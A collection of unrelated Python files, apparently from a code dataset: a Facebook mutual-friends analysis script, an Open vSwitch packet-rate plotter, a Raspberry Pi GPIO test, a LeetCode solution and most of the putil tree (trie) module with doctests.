#didnt use function here because wanted to return two separate dictionaries
for i in range(len(mutual_friends)):
try:
num_mutual_friends = int(mutual_friends[i].text[:-15])
except ValueError:
try:
num_mutual_friends = int(mutual_friends[i].text[:-14]) #singular when I only have "1 mutual friend"
except ValueError:
continue
friend_name = friend_names[i].find("a").text
if friend_name in mutual_friend_dict.keys():
dup_count = 0
while friend_name in mutual_friend_dict.keys(): #handles the duplicate error attaching an underscore and a label number to the name
dup_count+=1
if dup_count == 1: #first iteration so friend name does not have any extra stuff added onto it
friend_name = friend_name+"_"+str(dup_count)
else:
friend_name = friend_name[:-len(str(dup_count-1))-1]+"_"+str(dup_count) #concise way to label duplicates
mutual_friend_dict[friend_name] = num_mutual_friends
try:
friend_url = "http://facebook.com" +friend_names[i].find("a")["href"]
url_dict[friend_name] = friend_url
except KeyError: #these people dont have FB Urls and may have deleted their Facebooks
print(friend_name)
top_mutual_friends = sorted(mutual_friend_dict, key=mutual_friend_dict.get, reverse = True)
df_friends = pd.DataFrame(list(mutual_friend_dict.items()), columns=['Friend Name', 'Number of Mutual Friends'])
df_friends_decr = df_friends.sort_values(by =["Number of Mutual Friends"], ascending = False).reset_index(drop=True)
df_friends_decr["Ranking"] = df_friends_decr["Number of Mutual Friends"].rank(method = 'min', ascending = False)
df_friends_decr["Percentile"],df_friends_decr["Facebook Link"] = [None,None]
for index, row in df_friends_decr.iterrows(): #create percentile column
df_friends_decr.at[index,'Percentile'] = stats.percentileofscore(df_friends_decr["Number of Mutual Friends"],df_friends_decr["Number of Mutual Friends"][index])
try:
df_friends_decr.at[index,'Facebook Link'] = url_dict[df_friends_decr["Friend Name"][index]]
except KeyError: #people who deleted their FB
pass
df_friends_decr.to_csv("C:\\Users\\shawn\\Desktop\\Programming\\Facebook\\Facebook Friends, Mutual Friends, Link.csv", index = False) #change this
plt.figure()
plt.plot(df_friends_decr["Percentile"], df_friends_decr["Number of Mutual Friends"])
plt.title("Number of Facebook Friends vs Percentile")
plt.xlabel("Percentile")
plt.ylabel("Number of Facebook Friends")
plt.figure()
plt.hist(df_friends_decr["Number of Mutual Friends"], bins=30)
plt.title("Histogram for Number of Mutual Friends")
plt.xlabel("Number of Mutual Friends")
plt.ylabel("Frequency")
def find_friend_info(df, friend_name): #useful for finding specific friend info. If multiple people with the same name returns both
df_friend= df[df["Friend Name"].str.contains(friend_name)]
return df_friend
|
StarcoderdataPython
|
170765
|
<gh_stars>0
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import matplotlib.pyplot as plt
import commands
import time
i=0
tempo=600
x=list()
y11tx=list()
y11rx=list()
y12tx=list()
y12rx=list()
y14tx=list()
y14rx=list()
plt.ion() #Turn interactive mode on
fig,(ax11,ax12,ax14)=plt.subplots(3,sharex=True,sharey=True)
fig.suptitle('Taxa de Pacotes - Switch 3',fontsize=18)
ax11.set_title('Interface eth11',fontsize=14)
ax12.set_title('Interface eth12',fontsize=14)
ax14.set_title('Interface eth14',fontsize=14)
plt.xlabel('Tempo(s)',fontsize=14)
ax11.set_ylabel('Tx. Pacotes',fontsize=14)
ax12.set_ylabel('Tx. Pacotes',fontsize=14)
ax14.set_ylabel('Tx. Pacotes',fontsize=14)
ax11.grid()
ax12.grid()
ax14.grid()
plt.axis([0,tempo,0,10000])
while i<tempo:
tx11=int(commands.getoutput("ovs-ofctl dump-ports s3 11 | grep tx | awk -F= '{print $2}' | awk -F, '{print $1}'"))
rx11=int(commands.getoutput("ovs-ofctl dump-ports s3 11 | grep rx | awk -F= '{print $2}' | awk -F, '{print $1}'"))
tx12=int(commands.getoutput("ovs-ofctl dump-ports s3 12 | grep tx | awk -F= '{print $2}' | awk -F, '{print $1}'"))
rx12=int(commands.getoutput("ovs-ofctl dump-ports s3 12 | grep rx | awk -F= '{print $2}' | awk -F, '{print $1}'"))
tx14=int(commands.getoutput("ovs-ofctl dump-ports s3 14 | grep tx | awk -F= '{print $2}' | awk -F, '{print $1}'"))
rx14=int(commands.getoutput("ovs-ofctl dump-ports s3 14 | grep rx | awk -F= '{print $2}' | awk -F, '{print $1}'"))
x.append(i)
y11tx.append(tx11)
y11rx.append(rx11)
y12tx.append(tx12)
y12rx.append(rx12)
y14tx.append(tx14)
y14rx.append(rx14)
#ax11.scatter(i,tx11,c='r')
#ax11.scatter(i,rx11,c='g')
#ax12.scatter(i,tx12,c='r')
#ax12.scatter(i,rx12,c='g')
#ax14.scatter(i,tx14,c='r')
#ax14.scatter(i,rx14,c='g')
ax11.plot(x,y11tx,'r-',label='TX')
ax11.plot(x,y11rx,'g-',label='RX')
ax12.plot(x,y12tx,'r-',label='TX')
ax12.plot(x,y12rx,'g-',label='RX')
ax14.plot(x,y14tx,'r-',label='TX')
ax14.plot(x,y14rx,'g-',label='RX')
if i==0:
ax11.legend(loc='upper left',fontsize=12)
ax12.legend(loc='upper left',fontsize=12)
ax14.legend(loc='upper left',fontsize=12)
plt.show()
plt.pause(0.0001) #If there is an active figure it will be updated and displayed, and the GUI event loop will run during the pause
i+=1
time.sleep(1)
|
StarcoderdataPython
|
12607
|
'''
Part of the dibase.rpi.gpio.test package.
GPIO pin id support classes' platform tests.
Underlying GPIO pin ids are those used by the Linux gpiolib and used
to identify a device's GPIO pins in the Linux sys filesystem GPIO
sub-tree.
Developed by <NAME> / Dibase Limited.
Copyright (c) 2012 Dibase Limited
License: dual: GPL or BSD.
'''
import unittest
import sys
if __name__ == '__main__':
# Add path to directory containing the dibase package directory
sys.path.insert(0, './../../../..')
from dibase.rpi.gpio import pinid
class PinIdRPiPlatforrmTestCases(unittest.TestCase):
def test_0000_get_rpi_major_revision_index_returns_zero_or_positive_int(self):
returned_rev_index = pinid.PinId._get_rpi_major_revision_index()
self.assertIsNotNone(returned_rev_index)
self.assertIsInstance(returned_rev_index,int)
self.assertTrue(returned_rev_index>=0)
def test_0020_PinId_value_of_p1_sda_0_or_2(self):
rev_index = pinid.PinId._get_rpi_major_revision_index()
p1_sda_gpio_id = pinid.PinId.p1_sda()
self.assertTrue((rev_index==0 and p1_sda_gpio_id==0) or p1_sda_gpio_id==2)
if __name__ == '__main__':
unittest.main()
|
StarcoderdataPython
|
4986191
|
#!/usr/bin/env python3
import string
class Solution:
def uniqueLetterString(self, s):
d1, d2 = {c: -1 for c in string.ascii_uppercase}, {c: -1 for c in string.ascii_uppercase}
ret, last = 0, 0
for i, c in enumerate(s):
last = last + (i-1) + d2[c] - 2*d1[c] + 1
print(f'i = {i}, c = {c}, last = {last}')
ret += last
d1[c], d2[c] = i, d1[c]
return ret
sol = Solution()
s = 'LEETCODE'
s = 'ABA'
s = 'ABC'
print(sol.uniqueLetterString(s))
|
StarcoderdataPython
|
6692097
|
<reponame>pmacosta/putil<filename>putil/tree.py
# -*- coding: utf-8 -*-
# tree.py
# Copyright (c) 2013-2016 <NAME>
# See LICENSE for details
# pylint: disable=C0111,R0913,W0105,W0212
# Standard library imports
import copy
import sys
# Putil imports
import putil.exh
###
# Exception tracing initialization code
###
"""
[[[cog
import os, sys
if sys.hexversion < 0x03000000:
import __builtin__
else:
import builtins as __builtin__
sys.path.append(os.environ['TRACER_DIR'])
import trace_ex_tree
exobj_tree = trace_ex_tree.trace_module(no_print=True)
]]]
[[[end]]]
"""
###
# Functions
###
_F = lambda x, y: dict(field=x, value=y)
###
# Classes
###
class Tree(object):
r"""
Provides basic `trie <http://wikipedia.org/wiki/Trie>`_ (radix tree)
functionality
:param node_separator: Single character used to separate nodes in the tree
:type node_separator: string
:rtype: :py:class:`putil.tree.Tree` object
.. [[[cog cog.out(exobj_tree.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. putil.tree.Tree.__init__
:raises: RuntimeError (Argument \`node_separator\` is not valid)
.. [[[end]]]
"""
# pylint: disable=E0602,R0902,R0903
def __init__(self, node_separator='.'):
self._db = {}
self._root = None
self._root_hierarchy_length = None
ufunc = unichr if sys.hexversion < 0x03000000 else chr
# Characters from http://www.unicode.org/charts/PDF/U2500.pdf
self._vertical = ufunc(0x2502)
self._vertical_and_right = ufunc(0x251C)
self._up_and_right = ufunc(0x2514)
putil.exh.addai(
'node_separator',
(not isinstance(node_separator, str)) or
(isinstance(node_separator, str) and len(node_separator) != 1)
)
self._node_separator = node_separator
def __bool__(self): # pragma: no cover
"""
Returns :code:`False` if tree object has no nodes, :code:`True`
otherwise. For example:
>>> from __future__ import print_function
>>> import putil.tree
>>> tobj = putil.tree.Tree()
>>> if tobj:
... print('Boolean test returned: True')
... else:
... print('Boolean test returned: False')
Boolean test returned: False
>>> tobj.add_nodes([{'name':'root.branch1', 'data':5}])
>>> if tobj:
... print('Boolean test returned: True')
... else:
... print('Boolean test returned: False')
Boolean test returned: True
"""
return bool(self._db)
def __copy__(self, memodict=None):
memodict = {} if memodict is None else memodict
cobj = Tree(self.node_separator)
cobj._db = copy.deepcopy(self._db, memodict)
cobj._root = self._root
cobj._root_hierarchy_length = self._root_hierarchy_length
return cobj
def __nonzero__(self): # pragma: no cover
"""
Returns :code:`False` if tree object has no nodes, :code:`True`
otherwise. For example:
>>> from __future__ import print_function
>>> import putil.tree
>>> tobj = putil.tree.Tree()
>>> if tobj:
... print('Boolean test returned: True')
... else:
... print('Boolean test returned: False')
Boolean test returned: False
>>> tobj.add_nodes([{'name':'root.branch1', 'data':5}])
>>> if tobj:
... print('Boolean test returned: True')
... else:
... print('Boolean test returned: False')
Boolean test returned: True
"""
return bool(self._db)
def __str__(self):
"""
Returns a string with the tree 'pretty printed' as a
character-based structure. Only node names are shown,
nodes with data are marked with an asterisk (:code:`*`).
For example:
>>> from __future__ import print_function
>>> import putil.tree
>>> tobj = putil.tree.Tree()
>>> tobj.add_nodes([
... {'name':'root.branch1', 'data':5},
... {'name':'root.branch2', 'data':[]},
... {'name':'root.branch1.leaf1', 'data':[]},
... {'name':'root.branch1.leaf2', 'data':'Hello world!'}
... ])
>>> print(tobj)
root
├branch1 (*)
│├leaf1
│└leaf2 (*)
└branch2
:rtype: Unicode string
"""
ret = ''
if self._db:
ret = self._prt(
name=self.root_name, lparent=-1, sep='', pre1='', pre2=''
)
return ret.encode('utf-8') if sys.hexversion < 0x03000000 else ret
def _collapse_subtree(self, name, recursive=True):
""" Collapse a sub-tree """
oname = name
children = self._db[name]['children']
data = self._db[name]['data']
del_list = []
while (len(children) == 1) and (not data):
del_list.append(name)
name = children[0]
children = self._db[name]['children']
data = self._db[name]['data']
parent = self._db[oname]['parent']
self._db[name]['parent'] = parent
if parent:
self._db[parent]['children'].remove(oname)
self._db[parent]['children'] = sorted(
self._db[parent]['children']+[name]
)
else:
self._root = name
self._root_hierarchy_length = len(
self.root_name.split(self._node_separator)
)
for node in del_list:
self._del_node(node)
if recursive:
for name in copy.copy(children):
self._collapse_subtree(name)
def _create_intermediate_nodes(self, name):
""" Create intermediate nodes if hierarchy does not exist """
hierarchy = self._split_node_name(name, self.root_name)
node_tree = [
self.root_name+
self._node_separator+
self._node_separator.join(hierarchy[:num+1])
for num in range(len(hierarchy))
]
iobj = [
(child[:child.rfind(self._node_separator)], child)
for child in node_tree if child not in self._db
]
for parent, child in iobj:
self._db[child] = {
'parent':parent, 'children':[], 'data':[]
}
self._db[parent]['children'] = sorted(
self._db[parent]['children']+[child]
)
def _create_node(self, name, parent, children, data):
""" Create new tree node """
self._db[name] = {'parent':parent, 'children':children, 'data':data}
def _delete_prefix(self, name):
lname = len(name)+1
self._root = self._root[lname:]
self._root_hierarchy_length = len(
self.root_name.split(self._node_separator)
)
for key, value in list(self._db.items()):
value['parent'] = (
value['parent'][lname:]
if value['parent'] else
value['parent']
)
value['children'] = [child[lname:] for child in value['children']]
del self._db[key]
self._db[key[lname:]] = value
def _delete_subtree(self, nodes):
"""
Delete subtree private method (no argument validation and usage of
getter/setter private methods for speed)
"""
nodes = nodes if isinstance(nodes, list) else [nodes]
iobj = [
(self._db[node]['parent'], node)
for node in nodes
if self._node_name_in_tree(node)
]
for parent, node in iobj:
# Delete link to parent (if not root node)
del_list = self._get_subtree(node)
if parent:
self._db[parent]['children'].remove(node)
# Delete children (sub-tree)
for child in del_list:
del self._db[child]
if self._empty_tree():
self._root = None
self._root_hierarchy_length = None
def _del_node(self, name):
""" Delete tree node """
del self._db[name]
def _empty_tree(self):
""" Tests whether the object (tree) has any nodes/data """
return True if not self._db else False
def _find_common_prefix(self, node1, node2):
""" Find common prefix between two nodes """
tokens1 = [item.strip() for item in node1.split(self.node_separator)]
tokens2 = [item.strip() for item in node2.split(self.node_separator)]
ret = []
for token1, token2 in zip(tokens1, tokens2):
if token1 == token2:
ret.append(token1)
else:
break
return self.node_separator.join(ret)
def _get_children(self, name):
return self._db[name]['children']
def _get_data(self, name):
return self._db[name]['data']
def _get_nodes(self):
return None if not self._db else sorted(self._db.keys())
def _get_node_separator(self):
return self._node_separator
def _get_root_name(self):
return self._root
def _get_root_node(self):
return None if not self.root_name else self._db[self.root_name]
def _get_subtree(self, name):
return [name]+[
node for child in self._db[name]['children']
for node in self._get_subtree(child)
]
def _get_parent(self, name):
return self._db[name]['parent']
def _node_in_tree(self, name):
putil.exh.addex(
RuntimeError,
'Node *[name]* not in tree',
name not in self._db,
_F('name', name)
)
return True
def _node_name_in_tree(self, name):
putil.exh.addex(
RuntimeError,
'Node *[node_name]* not in tree',
name not in self._db,
_F('node_name', name)
)
return True
def _prt(self, name, lparent, sep, pre1, pre2):
"""
Print a row (leaf) of tree
:param name: Full node name
:type name: string
:param lparent: Position in full node name of last separator before
node to be printed
:type lparent: integer
:param pre1: Connector next to node name, either a null character if
the node to print is the root node, a right angle if node
name to be printed is a leaf or a rotated "T" if the node
name to be printed is one of many children
:type pre1: string
"""
# pylint: disable=R0914
nname = name[lparent+1:]
children = self._db[name]['children']
ncmu = len(children)-1
plst1 = ncmu*[self._vertical_and_right]+[self._up_and_right]
plst2 = ncmu*[self._vertical]+[' ']
slist = (ncmu+1)*[sep+pre2]
dmark = ' (*)' if self._db[name]['data'] else ''
return '\n'.join(
[
u'{sep}{connector}{name}{dmark}'.format(
sep=sep, connector=pre1, name=nname, dmark=dmark
)
]+
[
self._prt(child, len(name), sep=schar, pre1=p1, pre2=p2)
for child, p1, p2, schar in zip(children, plst1, plst2, slist)
]
)
def _rename_node(self, name, new_name):
"""
Rename node private method (no argument validation and usage of
getter/setter private methods for speed)
"""
# Update parent
if not self.is_root(name):
parent = self._db[name]['parent']
self._db[parent]['children'].remove(name)
self._db[parent]['children'] = sorted(
self._db[parent]['children']+[new_name]
)
# Update children
iobj = (
self._get_subtree(name)
if name != self.root_name else
self.nodes
)
for key in iobj:
new_key = key.replace(name, new_name, 1)
new_parent = (
self._db[key]['parent']
if key == name else
self._db[key]['parent'].replace(name, new_name, 1)
)
self._db[new_key] = {
'parent':new_parent,
'children':[
child.replace(name, new_name, 1)
for child in self._db[key]['children']
],
'data':copy.deepcopy(self._db[key]['data'])
}
del self._db[key]
if name == self.root_name:
self._root = new_name
self._root_hierarchy_length = len(
self.root_name.split(self._node_separator)
)
def _search_tree(self, name):
""" Search_tree for nodes that contain a specific hierarchy name """
tpl1 = '{sep}{name}{sep}'.format(sep=self._node_separator, name=name)
tpl2 = '{sep}{name}'.format(sep=self._node_separator, name=name)
tpl3 = '{name}{sep}'.format(sep=self._node_separator, name=name)
return sorted(
[
node
for node in self._db
if (tpl1 in node) or node.endswith(tpl2) or
node.startswith(tpl3) or (name == node)
]
)
def _set_children(self, name, children):
self._db[name]['children'] = sorted(list(set(children)))
def _set_data(self, name, data):
self._db[name]['data'] = data
def _set_root_name(self, name):
self._root = name
def _set_parent(self, name, parent):
self._db[name]['parent'] = parent
def _split_node_name(self, name, root_name=None):
return [
element.strip()
for element in name.strip().split(self._node_separator)
][0 if not root_name else self._root_hierarchy_length:]
def _validate_node_name(self, var_value):
""" NodeName pseudo-type validation """
# pylint: disable=R0201
var_values = var_value if isinstance(var_value, list) else [var_value]
for var_value in var_values:
if ((not isinstance(var_value, str)) or
(isinstance(var_value, str) and
((' ' in var_value) or
any(
[
element.strip() == ''
for element in
var_value.strip().split(self._node_separator)
]
)))):
return True
return False
def _validate_nodes_with_data(self, names):
""" NodeWithData pseudo-type validation """
node_ex = putil.exh.addai('nodes')
names = names if isinstance(names, list) else [names]
node_ex(not names)
for ndict in names:
node_ex(
(not isinstance(ndict, dict)) or
(isinstance(ndict, dict) and
(set(ndict.keys()) != set(['name', 'data'])))
)
name = ndict['name']
node_ex(
(not isinstance(name, str)) or
(
isinstance(name, str) and (
(' ' in name) or
any(
[
element.strip() == ''
for element in
name.strip().split(self._node_separator)
]
)
)
)
)
def add_nodes(self, nodes):
r"""
Adds nodes to tree
:param nodes: Node(s) to add with associated data. If there are
several list items in the argument with the same node
name the resulting node data is a list with items
corresponding to the data of each entry in the argument
with the same node name, in their order of appearance,
in addition to any existing node data if the node is
already present in the tree
:type nodes: :ref:`NodesWithData`
.. [[[cog cog.out(exobj_tree.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. putil.tree.Tree.add_nodes
:raises:
* RuntimeError (Argument \`nodes\` is not valid)
* ValueError (Illegal node name: *[node_name]*)
.. [[[end]]]
For example:
.. =[=cog
.. import docs.support.incfile
.. docs.support.incfile.incfile('tree_example.py', cog.out)
.. =]=
.. code-block:: python
# tree_example.py
import putil.tree
def create_tree():
tobj = putil.tree.Tree()
tobj.add_nodes([
{'name':'root.branch1', 'data':5},
{'name':'root.branch1', 'data':7},
{'name':'root.branch2', 'data':[]},
{'name':'root.branch1.leaf1', 'data':[]},
{'name':'root.branch1.leaf1.subleaf1', 'data':333},
{'name':'root.branch1.leaf2', 'data':'Hello world!'},
{'name':'root.branch1.leaf2.subleaf2', 'data':[]},
])
return tobj
.. =[=end=]=
.. code-block:: python
>>> from __future__ import print_function
>>> import docs.support.tree_example
>>> tobj = docs.support.tree_example.create_tree()
>>> print(tobj)
root
├branch1 (*)
│├leaf1
││└subleaf1 (*)
│└leaf2 (*)
│ └subleaf2
└branch2
>>> tobj.get_data('root.branch1')
[5, 7]
"""
self._validate_nodes_with_data(nodes)
inn_ex = putil.exh.addex(
ValueError, 'Illegal node name: *[node_name]*'
)
nodes = nodes if isinstance(nodes, list) else [nodes]
# Create root node (if needed)
if not self.root_name:
self._set_root_name(
nodes[0]['name'].split(self._node_separator)[0].strip()
)
self._root_hierarchy_length = len(
self.root_name.split(self._node_separator)
)
self._create_node(
name=self.root_name,
parent='',
children=[],
data=[]
)
# Process new data
for node_dict in nodes:
name, data = node_dict['name'], node_dict['data']
if name not in self._db:
# Validate node name (root of new node same as tree root)
inn_ex(
not name.startswith(self.root_name+self._node_separator),
_F('node_name', name)
)
self._create_intermediate_nodes(name)
self._db[name]['data'] += copy.deepcopy(
data
if isinstance(data, list) and data else
([] if isinstance(data, list) else [data])
)
def collapse_subtree(self, name, recursive=True):
r"""
Collapses a sub-tree; nodes that have a single child and no data are
combined with their child as a single tree node
:param name: Root of the sub-tree to collapse
:type name: :ref:`NodeName`
:param recursive: Flag that indicates whether the collapse operation
is performed on the whole sub-tree (True) or whether
it stops upon reaching the first node where the
collapsing condition is not satisfied (False)
:type recursive: boolean
.. [[[cog cog.out(exobj_tree.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. putil.tree.Tree.collapse_subtree
:raises:
* RuntimeError (Argument \`name\` is not valid)
* RuntimeError (Argument \`recursive\` is not valid)
* RuntimeError (Node *[name]* not in tree)
.. [[[end]]]
Using the same example tree created in
:py:meth:`putil.tree.Tree.add_nodes`::
>>> from __future__ import print_function
>>> import docs.support.tree_example
>>> tobj = docs.support.tree_example.create_tree()
>>> print(tobj)
root
├branch1 (*)
│├leaf1
││└subleaf1 (*)
│└leaf2 (*)
│ └subleaf2
└branch2
>>> tobj.collapse_subtree('root.branch1')
>>> print(tobj)
root
├branch1 (*)
│├leaf1.subleaf1 (*)
│└leaf2 (*)
│ └subleaf2
└branch2
``root.branch1.leaf1`` is collapsed because it only has one child
(``root.branch1.leaf1.subleaf1``) and no data; ``root.branch1.leaf2``
is not collapsed because although it has one child
(``root.branch1.leaf2.subleaf2``) and this child does have data
associated with it, :code:`'Hello world!'`
"""
iname_ex = putil.exh.addai('name')
irec_ex = putil.exh.addai('recursive')
iname_ex(self._validate_node_name(name))
irec_ex(not isinstance(recursive, bool))
self._node_in_tree(name)
self._collapse_subtree(name, recursive)
def copy_subtree(self, source_node, dest_node):
r"""
Copies a sub-tree from one sub-node to another. Data is added if some
nodes of the source sub-tree exist in the destination sub-tree
:param source_name: Root node of the sub-tree to copy from
:type source_name: :ref:`NodeName`
:param dest_name: Root node of the sub-tree to copy to
:type dest_name: :ref:`NodeName`
.. [[[cog cog.out(exobj_tree.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. putil.tree.Tree.copy_subtree
:raises:
* RuntimeError (Argument \`dest_node\` is not valid)
* RuntimeError (Argument \`source_node\` is not valid)
* RuntimeError (Illegal root in destination node)
* RuntimeError (Node *[source_node]* not in tree)
.. [[[end]]]
Using the same example tree created in
:py:meth:`putil.tree.Tree.add_nodes`::
>>> from __future__ import print_function
>>> import docs.support.tree_example
>>> tobj = docs.support.tree_example.create_tree()
>>> print(tobj)
root
├branch1 (*)
│├leaf1
││└subleaf1 (*)
│└leaf2 (*)
│ └subleaf2
└branch2
>>> tobj.copy_subtree('root.branch1', 'root.branch3')
>>> print(tobj)
root
├branch1 (*)
│├leaf1
││└subleaf1 (*)
│└leaf2 (*)
│ └subleaf2
├branch2
└branch3 (*)
├leaf1
│└subleaf1 (*)
└leaf2 (*)
└subleaf2
"""
src_ex = putil.exh.addai('source_node')
src_tree_ex = putil.exh.addex(
RuntimeError, 'Node *[source_node]* not in tree'
)
dest1_ex = putil.exh.addai('dest_node')
dest2_ex = putil.exh.addex(
RuntimeError, 'Illegal root in destination node'
)
src_ex(self._validate_node_name(source_node))
dest1_ex(self._validate_node_name(dest_node))
src_tree_ex(
source_node not in self._db, _F('source_node', source_node)
)
dest2_ex(not dest_node.startswith(self.root_name+self._node_separator))
for node in self._get_subtree(source_node):
self._db[node.replace(source_node, dest_node, 1)] = {
'parent':self._db[node]['parent'].replace(
source_node, dest_node, 1
),
'children':[
child.replace(source_node, dest_node, 1)
for child in self._db[node]['children']
],
'data':copy.deepcopy(self._db[node]['data'])}
self._create_intermediate_nodes(dest_node)
parent = self._node_separator.join(
dest_node.split(self._node_separator)[:-1]
)
self._db[dest_node]['parent'] = parent
self._db[parent]['children'] = sorted(
self._db[parent]['children']+[dest_node]
)
def delete_prefix(self, name):
r"""
Deletes hierarchy levels from all nodes in the tree
:param nodes: Prefix to delete
:type nodes: :ref:`NodeName`
.. [[[cog cog.out(exobj_tree.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. putil.tree.Tree.delete_prefix
:raises:
* RuntimeError (Argument \`name\` is not a valid prefix)
* RuntimeError (Argument \`name\` is not valid)
.. [[[end]]]
For example:
>>> from __future__ import print_function
>>> import putil.tree
>>> tobj = putil.tree.Tree('/')
>>> tobj.add_nodes([
... {'name':'hello/world/root', 'data':[]},
... {'name':'hello/world/root/anode', 'data':7},
... {'name':'hello/world/root/bnode', 'data':8},
... {'name':'hello/world/root/cnode', 'data':False},
... {'name':'hello/world/root/bnode/anode', 'data':['a', 'b']},
... {'name':'hello/world/root/cnode/anode/leaf', 'data':True}
... ])
>>> tobj.collapse_subtree('hello', recursive=False)
>>> print(tobj)
hello/world/root
├anode (*)
├bnode (*)
│└anode (*)
└cnode (*)
└anode
└leaf (*)
>>> tobj.delete_prefix('hello/world')
>>> print(tobj)
root
├anode (*)
├bnode (*)
│└anode (*)
└cnode (*)
└anode
└leaf (*)
"""
name_ex = putil.exh.addai('name')
prefix_ex = putil.exh.addex(
RuntimeError, 'Argument `name` is not a valid prefix'
)
name_ex(self._validate_node_name(name))
prefix_ex(
((not self.root_name.startswith(name)) or (self.root_name == name))
)
self._delete_prefix(name)
def delete_subtree(self, nodes):
r"""
Deletes nodes (and their sub-trees) from the tree
:param nodes: Node(s) to delete
:type nodes: :ref:`NodeName` or list of :ref:`NodeName`
.. [[[cog cog.out(exobj_tree.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. putil.tree.Tree.delete_subtree
:raises:
* RuntimeError (Argument \`nodes\` is not valid)
* RuntimeError (Node *[node_name]* not in tree)
.. [[[end]]]
Using the same example tree created in
:py:meth:`putil.tree.Tree.add_nodes`::
>>> from __future__ import print_function
>>> import docs.support.tree_example
>>> tobj = docs.support.tree_example.create_tree()
>>> print(tobj)
root
├branch1 (*)
│├leaf1
││└subleaf1 (*)
│└leaf2 (*)
│ └subleaf2
└branch2
>>> tobj.delete_subtree(['root.branch1.leaf1', 'root.branch2'])
>>> print(tobj)
root
└branch1 (*)
└leaf2 (*)
└subleaf2
"""
putil.exh.addai('nodes', self._validate_node_name(nodes))
self._delete_subtree(nodes)
def flatten_subtree(self, name):
r"""
Flattens sub-tree; nodes that have children and no data are merged
with each child
:param name: Ending hierarchy node whose sub-trees are to be
flattened
:type name: :ref:`NodeName`
.. [[[cog cog.out(exobj_tree.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. putil.tree.Tree.flatten_subtree
:raises:
* RuntimeError (Argument \`name\` is not valid)
* RuntimeError (Node *[name]* not in tree)
.. [[[end]]]
Using the same example tree created in
:py:meth:`putil.tree.Tree.add_nodes`::
>>> from __future__ import print_function
>>> import docs.support.tree_example
>>> tobj = docs.support.tree_example.create_tree()
>>> tobj.add_nodes([
... {'name':'root.branch1.leaf1.subleaf2', 'data':[]},
... {'name':'root.branch2.leaf1', 'data':'loren ipsum'},
... {'name':'root.branch2.leaf1.another_subleaf1', 'data':[]},
... {'name':'root.branch2.leaf1.another_subleaf2', 'data':[]}
... ])
>>> print(str(tobj))
root
├branch1 (*)
│├leaf1
││├subleaf1 (*)
││└subleaf2
│└leaf2 (*)
│ └subleaf2
└branch2
└leaf1 (*)
├another_subleaf1
└another_subleaf2
>>> tobj.flatten_subtree('root.branch1.leaf1')
>>> print(str(tobj))
root
├branch1 (*)
│├leaf1.subleaf1 (*)
│├leaf1.subleaf2
│└leaf2 (*)
│ └subleaf2
└branch2
└leaf1 (*)
├another_subleaf1
└another_subleaf2
>>> tobj.flatten_subtree('root.branch2.leaf1')
>>> print(str(tobj))
root
├branch1 (*)
│├leaf1.subleaf1 (*)
│├leaf1.subleaf2
│└leaf2 (*)
│ └subleaf2
└branch2
└leaf1 (*)
├another_subleaf1
└another_subleaf2
"""
putil.exh.addai('name', self._validate_node_name(name))
self._node_in_tree(name)
parent = self._db[name]['parent']
if (parent) and (not self._db[name]['data']):
children = self._db[name]['children']
for child in children:
self._db[child]['parent'] = parent
self._db[parent]['children'].remove(name)
self._db[parent]['children'] = sorted(
self._db[parent]['children']+children
)
del self._db[name]
def get_children(self, name):
r"""
Gets the children node names of a node
:param name: Parent node name
:type name: :ref:`NodeName`
:rtype: list of :ref:`NodeName`
.. [[[cog cog.out(exobj_tree.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. putil.tree.Tree.get_children
:raises:
* RuntimeError (Argument \`name\` is not valid)
* RuntimeError (Node *[name]* not in tree)
.. [[[end]]]
"""
putil.exh.addai('name', self._validate_node_name(name))
self._node_in_tree(name)
return sorted(self._db[name]['children'])
def get_data(self, name):
r"""
Gets the data associated with a node
:param name: Node name
:type name: :ref:`NodeName`
:rtype: any type or list of objects of any type
.. [[[cog cog.out(exobj_tree.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. putil.tree.Tree.get_data
:raises:
* RuntimeError (Argument \`name\` is not valid)
* RuntimeError (Node *[name]* not in tree)
.. [[[end]]]
"""
putil.exh.addai('name', self._validate_node_name(name))
self._node_in_tree(name)
return self._db[name]['data']
def get_leafs(self, name):
r"""
Gets the sub-tree leaf node(s)
:param name: Sub-tree root node name
:type name: :ref:`NodeName`
:rtype: list of :ref:`NodeName`
.. [[[cog cog.out(exobj_tree.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. putil.tree.Tree.get_leafs
:raises:
* RuntimeError (Argument \`name\` is not valid)
* RuntimeError (Node *[name]* not in tree)
.. [[[end]]]
"""
putil.exh.addai('name', self._validate_node_name(name))
self._node_in_tree(name)
return [node for node in self._get_subtree(name) if self.is_leaf(node)]
def get_node(self, name):
r"""
Gets a tree node structure. The structure is a dictionary with the
following keys:
* **parent** (*NodeName*) Parent node name, :code:`''` if the
node is the root node
* **children** (*list of NodeName*) Children node names, an
empty list if node is a leaf
* **data** (*list*) Node data, an empty list if node contains no data
:param name: Node name
:type name: string
:rtype: dictionary
.. [[[cog cog.out(exobj_tree.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. putil.tree.Tree.get_node
:raises:
* RuntimeError (Argument \`name\` is not valid)
* RuntimeError (Node *[name]* not in tree)
.. [[[end]]]
"""
putil.exh.addai('name', self._validate_node_name(name))
self._node_in_tree(name)
return self._db[name]
def get_node_children(self, name):
r"""
Gets the list of children structures of a node. See
:py:meth:`putil.tree.Tree.get_node` for details about the structure
:param name: Parent node name
:type name: :ref:`NodeName`
:rtype: list
.. [[[cog cog.out(exobj_tree.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. putil.tree.Tree.get_node_children
:raises:
* RuntimeError (Argument \`name\` is not valid)
* RuntimeError (Node *[name]* not in tree)
.. [[[end]]]
"""
putil.exh.addai('name', self._validate_node_name(name))
self._node_in_tree(name)
return [self._db[child] for child in self._db[name]['children']]
def get_node_parent(self, name):
r"""
Gets the parent structure of a node. See
:py:meth:`putil.tree.Tree.get_node` for details about the structure
